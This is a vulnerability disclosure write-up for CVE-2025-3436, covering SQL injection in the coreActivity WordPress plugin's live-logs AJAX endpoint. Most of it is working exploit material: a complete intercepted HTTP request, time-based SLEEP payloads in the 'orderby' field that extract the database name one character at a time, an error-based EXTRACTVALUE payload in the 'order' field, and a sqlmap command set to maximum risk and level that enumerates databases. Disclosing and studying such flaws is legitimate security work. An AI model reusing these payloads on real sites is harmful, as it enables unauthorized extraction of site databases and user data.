CVE-2025-3436: Multiple SQL Injection in coreActivity Activity Logging plugin for WordPress - Report

Reference / Advisory Number : CVE-2025-3436

Vulnerable WordPress Plugin Link: https://wordpress.org/plugins/coreactivity/

Description of the vulnerability

The coreActivity Activity Logging plugin for WordPress suffers from a time based SQL injection and Boolan-based SQL Injection vulnerabilities in the /wpadmin/admin-ajax.php?action=coreactivity_live_logs. The vulnerable parameter is the "args" parameter., the exact injection occurs in "orderby" and "order" fields. More details can be found in the analysis above with manual exploitation.

An authenticated attacker can inject specially crafted SQL payloads to extract data from the underlying database.

These vulnerabilities allow an authenticated attacker to manipulate SQL queries by injecting malicious SQL code.

Burpsuite Request (cookies header need to be updated by your cookies when authenticated)

POST /wp-admin/admin-ajax.php?action=coreactivity_live_logs HTTP/1.1 Host: 10.0.1.124 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0 Accept: text/html, /; q=0.01 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Referer: http://10.0.1.124/wp-admin/admin.php?page=coreactivity-logs Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 638 Origin: http://10.0.1.124Connection: keep-alive Cookie: [Your cookies here]

args={"lock":{"blog_id":-1},"atts":{"filter-blog_id":0,"filter-user_id":0,"filter-event_id":0,"filter-ip":"","filtercomponent":"","filter-country_code":"","filter-context":"","filter-method":"","filter-object_type":"","filterobject_id":0,"filterobject_name":"","view":"","search":"","period":"","orderby":"1","order":"DESC","paged":0,"min_id":0},"limit": [],"filter":"coreactivity","settings": {"_display_meta_column":false,"_logs_instance":"coreactivity","_filter_key":"coreactivity","_meta_column": [],"_rows_per_page_key":"coreactivity_logs_rows_per_page","_current_view":""},"id":"152","nonce":"f26596f318","page":"coreacti vity-logs"}

Steps to reproduce

• Install the WordPress plugin : coreActivity Activity Logging plugin for WordPress

  • Link: https://wordpress.org/plugins/coreactivity/

• Set up a web proxy such as Burp Suite or Caido to intercept the web requests made by the web browser

• Access to coreActivity bar in WordPress admin panel

• On the web proxy's history look for a POST request to the /wp-admin/admin-ajax.php?action=coreactivity_live_logs endpoint and send it to repeater

The request got following the steps above

Then we got the request in Burp Proxy History

In Burp (or your proxy), replace the parameters in the URL with the following parameters to provoke SQL Error (for order field and same for orderby field)

args={"lock":{"blog_id":-1},"atts":{"filter-blog_id":0,"filter-user_id":0,"filter-event_id":0,"filter-ip":"","filtercomponent":"","filter-country_code":"","filter-context":"","filter-method":"","filter-object_type":"","filterobject_id":0,"filterobject_name":"","view":"","search":"","period":"","orderby":"1","order":"DESC'","paged":0,"min_id":0},"limit": [],"filter":"coreactivity","settings": {"_display_meta_column":false,"_logs_instance":"coreactivity","_filter_key":"coreactivity","_meta_column": [],"_rows_per_page_key":"coreactivity_logs_rows_per_page","_current_view":""},"id":"10","nonce":"24a53b57aa","page":"coreactiv ity-logs"}

Got Error sql MariaDB> Potential SQL Injection

Notice the following injectable json fiels in args parameter (all the following fields provoke SQL error when injecting quote "'")

• orderby

• order

Manual Exploit

• field: orderby

In Burp (or your proxy), replace the parameters in the URL with the following parameters

args={"lock":{"blog_id":-1},"atts":{"filter-blog_id":0,"filter-user_id":0,"filter-event_id":0,"filter-ip":"","filtercomponent":"","filter-country_code":"","filter-context":"","filter-method":"","filter-object_type":"","filterobject_id":0,"filter-object_name":"","view":"","search":"","period":"","orderby":"1+AND+(SELECT+1598+FROM+ (SELECT(SLEEP(5)))a)","order":"DESC","paged":0,"min_id":0},"limit":[],"filter":"coreactivity","settings": {"_display_meta_column":false,"_logs_instance":"coreactivity","_filter_key":"coreactivity","_meta_column": [],"_rows_per_page_key":"coreactivity_logs_rows_per_page","_current_view":""},"id":"152","nonce":"f26596f318","page":"coreacti vity-logs"}

the orderby value is: 1+AND+(SELECT+1598+FROM+(SELECT(SLEEP(5)))a)

Then we got a sleep for ~6 seconds

To further exploit the potential for data extraction, we can utilize the following parameter:

args={"lock":{"blog_id":-1},"atts":{"filter-blog_id":0,"filter-user_id":0,"filter-event_id":0,"filter-ip":"","filtercomponent":"","filter-country_code":"","filter-context":"","filter-method":"","filter-object_type":"","filterobject_id":0,"filter-object_name":"","view":"","search":"","period":"","orderby":"1+AND+(SELECT+1598+FROM+ (SELECT+IF(SUBSTRING(DATABASE(),1,1)='w',SLEEP(5),0))a)","order":"DESC","paged":0,"min_id":0},"limit": [],"filter":"coreactivity","settings": {"_display_meta_column":false,"_logs_instance":"coreactivity","_filter_key":"coreactivity","_meta_column": [],"_rows_per_page_key":"coreactivity_logs_rows_per_page","_current_view":""},"id":"152","nonce":"f26596f318","page":"coreacti vity-logs"}

the response for the payload "1+AND+(SELECT+1598+FROM+(SELECT+IF(SUBSTRING(DATABASE(),1,1)='w',SLEEP(5),0))a)" injected in orderby field sleep because "w" is the first char of the database name

Finally, we can extract the database name "wordpress" using burp intruder with Cluster bomb attack type and analyzing the response

The following screenshot show us the sleeping time and using request order, we can get the name of database "wordpress"

• field: order "Boolean-Based SQL Injection"

For this field, i used EXTRACTVALUE() function, which is typically used in XML path language expressions. It's used to trigger XML-related error messages that can expose data in an error-based SQL injection.

In our request, we change the "args" parameter with:

args={"lock":{"blog_id":-1},"atts":{"filter-blog_id":0,"filter-user_id":0,"filter-event_id":0,"filter-ip":"","filtercomponent":"","filter-country_code":"","filter-context":"","filter-method":"","filter-object_type":"","filterobject_id":0,"filterobject_name":"","view":"","search":"","period":"","orderby":"1","order":"-3196+OR+EXTRACTVALUE(3993,+CONCAT(0x3a,+ (SELECT+DATABASE())))","paged":0,"min_id":0},"limit":[],"filter":"coreactivity","settings": {"_display_meta_column":false,"_logs_instance":"coreactivity","_filter_key":"coreactivity","_meta_column": [],"_rows_per_page_key":"coreactivity_logs_rows_per_page","_current_view":""},"id":"152","nonce":"f26596f318","page":"coreacti vity-logs"}

The "order" field is: -3196+OR+EXTRACTVALUE(3993,+CONCAT(0x3a,+(SELECT+DATABASE())))

The following screenshot show us the database name "wordpress" extraction

Automatic Exploit using SQLMAP

sqlmap -r req1_log.txt --random-agent --risk 3 --level 5 --dbms=mariadb,mysql --dbs

But don’t forget to add “*” in your injection location.

Cheers — thanks for reading, and keep security first.